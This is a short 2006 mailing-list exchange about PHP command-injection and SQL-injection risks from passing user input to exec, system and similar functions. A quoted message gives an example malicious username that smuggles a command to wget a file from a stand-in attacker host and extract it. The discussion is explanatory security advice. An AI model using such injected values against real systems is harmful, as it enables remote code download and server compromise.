[CS-FSLUG] PHP vulnerabilities?
Tim Young
Tim.Young at LightSys.org
Sat Jun 3 09:05:59 CDT 2006
An insertion attack usually happens when you are interfacing with the
outside world, doing a password lookup from a file or database, etc.
Using backticks, the "system" command, exec, shell_exec, passthru, etc.
The common name for this problem with databases is "SQL insertion".
- Tim Young
Frank Bax wrote:
> At 09:42 AM 6/2/06, Tim Young wrote:
>
>> Instead of having a username "Tim", they use something like:
>> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
>> badfile.tgz')\""
>>
>>
>
> What kind of PHP code would cause the above user input to be executed? A
> "decent chance" implies the problem only surfaces with some coding practices.
>
>
>
More information about the Christiansource
mailing list